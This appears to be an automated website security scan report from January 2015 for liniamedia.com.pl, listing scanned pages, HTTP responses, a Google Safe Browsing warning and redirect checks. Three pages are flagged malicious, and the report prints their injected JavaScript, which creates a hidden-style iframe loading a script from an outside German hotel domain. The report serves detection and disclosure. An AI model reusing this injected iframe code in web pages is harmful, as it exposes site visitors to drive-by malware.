Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=liniamedia.com.pl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://liniamedia.com.pl/ | HTTP/1.1 301 Moved Connection: close Date: Thu, 08 Jan 2015 17:59:29 GMT Location: http://liniamedia.com.pl/public/ Server: IdeaWebServer/v0.80 Content-Length: 188 Content-Type: text/html | clean |
http://liniamedia.com.pl/public/ | 200 OK Content-Length: 32525 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var id = '4'; var gocw09 = document.createElement('iframe'); gocw09.src = 'http://hotel-schoener-brunnen.de/traf.php'; gocw09.style.position = 'absolute'; gocw09.style.border = '1'; gocw09.style.height = '31px'; gocw09.style.width = '42px'; gocw09.style.left = '500px'; gocw09.style.top = '100px'; if (!document.getElementById('gocw')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'gocw\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('gocw').appendChild(gocw09); }})(); Antivirus reports:
| ||
http://liniamedia.com.pl/forum/ | 200 OK Content-Length: 186 Content-Type: text/html | clean |
http://liniamedia.com.pl/test404page.js | 404 Not Found Content-Length: 185 Content-Type: text/html | clean |
http://liniamedia.com.pl/katalog/ | 200 OK Content-Length: 33374 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var id = '4'; var gocw09 = document.createElement('iframe'); gocw09.src = 'http://hotel-schoener-brunnen.de/traf.php'; gocw09.style.position = 'absolute'; gocw09.style.border = '1'; gocw09.style.height = '31px'; gocw09.style.width = '42px'; gocw09.style.left = '500px'; gocw09.style.top = '100px'; if (!document.getElementById('gocw')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'gocw\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('gocw').appendChild(gocw09); }})(); Antivirus reports:
| ||
http://liniamedia.com.pl/chat/ | HTTP/1.1 302 Found Connection: close Date: Thu, 08 Jan 2015 17:59:31 GMT Location: ../chat.html Server: IdeaWebServer/v0.80 Content-Length: 168 Content-Type: text/html | clean |
http://liniamedia.com.pl/chat/../chat.html | 404 Not Found Content-Length: 188 Content-Type: text/html | clean |
http://liniamedia.com.pl/public/kontakt.html | 200 OK Content-Length: 16203 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var id = '77131'; var a09 = document.createElement('iframe'); a09.src = 'http://hotel-schoener-brunnen.de/traf.php'; a09.style.position = 'absolute'; a09.style.border = '1'; a09.style.height = '31px'; a09.style.width = '42px'; a09.style.left = '500px'; a09.style.top = '100px'; if (!document.getElementById('a')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'a\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('a').appendChild(a09); }})(); Antivirus reports:
| ||
http://linia.com.pl/ads/adpopup.php?n=a0373404&what=zone:9&left=50&top=100&timeout=60&delay=20 | HTTP/1.1 301 Moved Connection: close Date: Thu, 08 Jan 2015 17:59:32 GMT Location: http://www.linia.com.pl/ads/adpopup.php?n=a0373404&what=zone:9&left=50&top=100&timeout=60&delay=20 Server: IdeaWebServer/v0.80 Content-Length: 274 Content-Type: text/html | clean |
http://www.linia.com.pl/ads/adpopup.php?n=a0373404&what=zone:9&left=50&top=100&timeout=60&delay=20 | 404 Not Found Content-Length: 265 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://liniamedia.com.pl/cennikreklam.html | 404 Not Found Content-Length: 188 Content-Type: text/html | clean |
http://liniamedia.com.pl/stats.php | 200 OK Content-Length: 4081 Content-Type: text/html | clean |
http://liniamedia.com.pl/cennik_ogloszen_drobnych_2011.pdf | 200 OK Content-Length: 302632 Content-Type: application/pdf | clean |
http://liniamedia.com.pl/section.php?1-0-0 | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://liniamedia.com.pl/section.php?1-41-0 | 404 Not Found Content-Length: 189 Content-Type: text/html | clean |
http://liniamedia.com.pl/section.php?1-40-0 | 404 Not Found Content-Length: 189 Content-Type: text/html | clean |
http://liniamedia.com.pl/section.php?1-28-0 | 404 Not Found Content-Length: 189 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: liniamedia.com.pl
Result:
HTTP/1.1 301 Moved
Connection: close
Date: Thu, 08 Jan 2015 17:59:29 GMT
Location: http://liniamedia.com.pl/public/
Server: IdeaWebServer/v0.80
Content-Length: 188
Content-Type: text/html
...188 bytes of data.
GET / HTTP/1.1
Host: liniamedia.com.pl
Result:
HTTP/1.1 301 Moved
Connection: close
Date: Thu, 08 Jan 2015 17:59:29 GMT
Location: http://liniamedia.com.pl/public/
Server: IdeaWebServer/v0.80
Content-Length: 188
Content-Type: text/html
...188 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: liniamedia.com.pl
Referer: http://www.google.com/search?q=liniamedia.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: liniamedia.com.pl
Referer: http://www.google.com/search?q=liniamedia.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
